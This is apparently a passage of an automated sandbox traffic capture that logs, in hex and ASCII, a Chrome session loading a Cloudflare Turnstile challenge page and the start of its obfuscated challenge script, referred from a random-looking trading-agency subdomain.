                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                  Referer: https://52kz793.afratradingagency.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:48 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 26678
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                                                  cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                  cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                  referrer-policy: same-origin
                                                                                                                                                                                                                                  document-policy: js-profiling
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 31 38 65 65 30 38 62 66 61 34 31 66 38 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8f418ee08bfa41f8-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                                                                                                                                  Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                                                                                                                                  Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                                                                                                                                  Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                                                                                                                                  Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                                                                                                                                                  Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                                                                                                                                  Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                                                                                                                                  Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                                                                                                                                  Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  32192.168.2.1649768104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f418ee08bfa41f8&lang=auto HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/j2coa/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:50 GMT
                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 115652
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418eec9fd041f5-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                                                                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC1369INData Raw: 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 74 75 72 6e 73 74 69 6c
                                                                                                                                                                                                                                  Data Ascii: nnection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","human_button_text":"Verify%20you%20are%20human","turnstile_refresh":"Refresh","turnstile_feedback_description":"Send%20Feedback","turnstil
                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC1369INData Raw: 2c 66 58 2c 66 59 2c 67 32 2c 67 33 2c 67 34 2c 67 37 2c 67 38 2c 67 45 2c 67 35 2c 67 36 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 32 32 30 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 30 32 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 30 31 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 32 34 31 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 33 33 30 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 33 37 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 37 35 33 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28
                                                                                                                                                                                                                                  Data Ascii: ,fX,fY,g2,g3,g4,g7,g8,gE,g5,g6){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(220))/1+parseInt(gI(702))/2*(-parseInt(gI(1501))/3)+-parseInt(gI(241))/4*(parseInt(gI(330))/5)+-parseInt(gI(1337))/6*(parseInt(gI(753))/7)+parseInt(gI(
                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC1369INData Raw: 5b 67 4a 28 31 30 36 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 67 4f 2c 69 2c 6a 2c 46 2c 47 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d 28 67 4f 3d 67 4a 2c 7b 27 4c 43 78 62 74 27 3a 67 4f 28 31 30 30 36 29 2c 27 49 67 49 4e 70 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 29 7b 72 65 74 75 72 6e 20 45 28 46 2c 47 29 7d 2c 27 67 6f 49 71 4f 27 3a 67 4f 28 38 35 34 29 2c 27 65 6e 4a 71 46 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 29 7b 72 65 74 75 72 6e 20 45 28 46 2c 47 29 7d 2c 27 53 72 5a 4f 59 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 7d 2c 27 65 48 5a 44 72 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b
                                                                                                                                                                                                                                  Data Ascii: [gJ(1064)]=function(f,g,h,gO,i,j,F,G,k,l,m,n,o,s,x,B,C,D){i=(gO=gJ,{'LCxbt':gO(1006),'IgINp':function(E,F,G){return E(F,G)},'goIqO':gO(854),'enJqF':function(E,F,G){return E(F,G)},'SrZOY':function(E,F){return E instanceof F},'eHZDr':function(E,F){return E+
                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC1369INData Raw: 2e 63 63 3d 67 2c 42 5b 67 4f 28 34 36 31 29 5d 3d 6b 2c 42 5b 67 4f 28 31 33 31 37 29 5d 3d 6f 2c 43 3d 4a 53 4f 4e 5b 67 4f 28 31 32 30 33 29 5d 28 42 29 2c 44 3d 67 34 5b 67 4f 28 33 31 30 29 5d 28 43 29 5b 67 4f 28 38 39 30 29 5d 28 27 2b 27 2c 69 5b 67 4f 28 32 37 31 29 5d 29 2c 73 5b 67 4f 28 38 35 32 29 5d 28 27 76 5f 27 2b 65 4d 5b 67 4f 28 31 34 31 31 29 5d 5b 67 4f 28 31 34 30 36 29 5d 2b 27 3d 27 2b 44 29 7d 63 61 74 63 68 28 46 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 31 34 35 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 67 52 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 69 66 28 67 52 3d 67 4a 2c 65 3d 7b 27 53 41 53 51 59 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 66 6e 6e 73 4a 27 3a
                                                                                                                                                                                                                                  Data Ascii: .cc=g,B[gO(461)]=k,B[gO(1317)]=o,C=JSON[gO(1203)](B),D=g4[gO(310)](C)[gO(890)]('+',i[gO(271)]),s[gO(852)]('v_'+eM[gO(1411)][gO(1406)]+'='+D)}catch(F){}},eM[gJ(1459)]=function(d,gR,e,f,g,h,i,j,k,l,m){if(gR=gJ,e={'SASQY':function(n,o){return o===n},'fnnsJ':
                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC1369INData Raw: 73 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 73 5b 67 54 28 32 30 36 29 5d 5b 67 54 28 34 36 32 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 69 66 28 6c 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 69 5b 67 54 28 31 33 33 36 29 5d 28 43 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 76 26 26 69 5b 67 54 28 32 39 33 29 5d 28 78 2c 42 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 76 26 26 76 5b 67 54 28 36 34 31 29 5d 5b 67 54 28 37 31 38 29 5d 28 76 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 6f 5b 67 54 28 32 30 36 29 5d 5b 67 54 28 32 33 31 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 76 3d 6e 5b 67 54 28 31 34 31 31 29 5d 5b 67 54 28 33 30 31 29 5d 5b
                                                                                                                                                                                                                                  Data Ascii: s++]){case'0':s[gT(206)][gT(462)]();continue;case'1':if(l)return;continue;case'2':i[gT(1336)](C);continue;case'3':v&&i[gT(293)](x,B);continue;case'4':v&&v[gT(641)][gT(718)](v);continue;case'5':o[gT(206)][gT(231)]();continue;case'6':v=n[gT(1411)][gT(301)][
